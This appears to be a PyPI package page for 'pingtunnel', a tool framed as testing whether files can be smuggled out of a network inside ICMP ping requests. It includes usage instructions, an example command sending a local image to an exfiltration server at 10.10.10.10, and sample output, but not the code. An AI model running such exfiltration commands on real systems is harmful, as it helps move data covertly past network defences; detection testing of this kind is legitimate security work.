Test possible data exfiltration through ping requests
Project description
Description
Test possible data exfiltration through ping requests
Installation
pip install pingtunnel
Usage
From command line:
python -m pingtunnel --path PATH --target TARGET
Option | Short | Type | Default | Description |
---|---|---|---|---|
--path | -p | String | - | Path to file to be exfiltrated |
--path | -p | String | - | IP of exfiltration server |
Example
python -m pingtunnel -p ./example.jpg -t 10.10.10.10
- Make sure to use
tcpdump
orwireshark
on the exfiltration server in order to capture the ping requests
################################################################################
pingtunnel by 5f0
Test possible data exfiltration through ping requests
Current working directory: path/to/pingtunnel
Datetime: 01/01/1970 10:11:12
################################################################################
Status
---
Exfiltration Server: 10.10.10.10
File to be exfiltrated: ./example.jpg
Total Number of Bytes: 1094
Number of Ping Requests: 35.0
Execution
---
-> Split ./example.jpg in 35.0 chunks
-> Send chunks
--> Transmission successful!
################################################################################
Execution Time: 0.014563 sec
License
MIT
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
pingtunnel-1.0.0.tar.gz
(3.5 kB
view hashes)
Built Distribution
Close
Hashes for pingtunnel-1.0.0-py3-none-any.whl
Algorithm | Hash digest | |
---|---|---|
SHA256 | 76ae4d49691cc7d5acced41337725e1dc71dd0e6d64c106ad4833ac4b86015d1 |
|
MD5 | 9a1f4c7c1c49b2d3a01a5b0778771a98 |
|
BLAKE2b-256 | 68e62ec429c57846f2ee00f0734abd333360c10d969a0c0bc882db1c99a9335c |